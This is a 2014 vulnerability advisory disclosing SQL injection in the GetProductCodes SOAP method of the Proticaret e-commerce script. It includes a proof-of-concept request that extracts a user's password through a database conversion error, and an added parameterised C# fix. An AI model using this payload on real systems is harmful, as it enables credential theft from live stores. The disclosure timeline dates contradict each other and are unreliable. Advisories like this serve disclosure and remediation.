Document Title:
============
Proticaret E-Commerce Script v3.0 >= SQL Injection
Release Date:
===========
13 Nov 2014
Product & Service Introduction:
========================
Proticaret is a free e-commerce script.
Abstract Advisory Information:
=======================
BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0.
Vulnerability Disclosure Timeline:
=========================
20 Oct 2014 : Contact with Vendor
20 Nov 2014 : Vendor Response
26 Jun 2014 : Patch Released
13 Nov 2014 : Public Disclosure
Discovery Status:
=============
Published
Affected Product(s):
===============
Promist Bilgi İletişim Teknolojileri A.Ş
Product: Proticaret E-commerce Script v3.0 >=
Exploitation Technique:
==================
Remote, Unauthenticated
Severity Level:
===========
Critical
Technical Details & Description:
========================
SQL injection in the Code parameter of the GetProductCodes SOAP method (ASPNetPortal.ProductService): the parameter is used unsanitised in a SQL Server query, and the database error returned in the SOAP fault discloses the result of an injected subquery (see the proof of concept below).
Proof of Concept (PoC):
==================
Proof of Concept
Request:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:GetProductCodes>
<!--Optional:-->
<tem:Code>1' from Users where (select top 1 password from users where userId=101)>1- -</tem:Code>
<!--Optional:-->
<tem:StartWith>?</tem:StartWith>
</tem:GetProductCodes>
</soapenv:Body>
</soapenv:Envelope>
Response:
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<soap:Fault>
<faultcode>soap:Server</faultcode>
<faultstring>System.Web.Services.Protocols.SoapException: Server
was unable to process request. --->
System.Data.SqlClient.SqlException: Conversion failed when converting
the nvarchar value 'secretpassword' to data type int.
at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException
exception, Boolean breakConnection, Action`1 wrapCloseInAction)
at
System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject
stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)
at
System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior,
SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet
bulkCopyHandler, TdsParserStateObject stateObj, Boolean&
dataReady)
at System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Boolean& moreRows)
at System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Boolean& more)
at System.Data.SqlClient.SqlDataReader.Read()
at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith)
--- End of inner exception stack trace ---</faultstring>
<detail/>
</soap:Fault>
</soap:Body>
</soap:Envelope>
Solution Fix & Patch:
================
Apply the vendor's patch for v3.0.
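Added example, not the vendor's patch or the Proticaret source: the ProductService.GetProductCodes(Code, StartWith) method named in the stack trace, rewritten so that both inputs are bound as SqlParameters, LIKE metacharacters in StartWith are escaped, and a SqlException is logged server-side and turned into a generic SOAP fault rather than echoed to the client as in the PoC response. The table and column names, the connection string and the prefix-match semantics of StartWith are assumptions.

```csharp
using System.Collections.Generic;
using System.Data;
using System.Data.SqlClient;
using System.Diagnostics;
using System.Web.Services;
using System.Web.Services.Protocols;
public class ProductService : WebService
{
    // Placeholder: the real connection string is not part of the advisory.
    private const string ConnectionString = "<connection string>";
    // In the vulnerable shape implied by the PoC, Code is spliced into the query
    // text, so the quote closes the literal and the rest runs as SQL, and the
    // nvarchar-to-int conversion error carries the subquery result to the caller.
    [WebMethod]
    public List<string> GetProductCodes(string Code, string StartWith)
    {
        // Assumed schema: the advisory does not name the table or columns.
        const string sql = "SELECT ProductCode FROM Products " +
                           "WHERE ProductCode = @code OR ProductCode LIKE @prefix + '%'";
        var codes = new List<string>();
        try
        {
            using (var conn = new SqlConnection(ConnectionString))
            using (var cmd = new SqlCommand(sql, conn))
            {
                // Typed, length-bounded parameters travel as data, not SQL text:
                // a quote in Code can no longer terminate the string literal.
                cmd.Parameters.Add("@code", SqlDbType.NVarChar, 50).Value = Code ?? "";
                cmd.Parameters.Add("@prefix", SqlDbType.NVarChar, 50).Value =
                    EscapeLike(StartWith ?? "");
                conn.Open();
                using (SqlDataReader reader = cmd.ExecuteReader())
                    while (reader.Read()) codes.Add(reader.GetString(0));
            }
        }
        catch (SqlException ex)
        {
            // Log server-side and return a generic fault so SQL errors (and any data
            // embedded in them, as in the PoC response) never reach the client.
            Trace.TraceError("GetProductCodes failed: {0}", ex);
            throw new SoapException("Unable to process request.", SoapException.ServerFaultCode);
        }
        return codes;
    }
    // Bracket-escape LIKE metacharacters so StartWith is matched as a literal prefix.
    private static string EscapeLike(string s)
    {
        return s.Replace("[", "[[]").Replace("%", "[%]").Replace("_", "[_]");
    }
}
```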
Security Risk:
==========
The risk of the vulnerability described above is estimated as critical.
Credits & Authors:
==============
Bilgi Güvenliği Akademisi
Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
Domain: www.bga.com.tr
Social: twitter.com/bgasecurity
Contact: [email protected]
Copyright © 2014 | BGA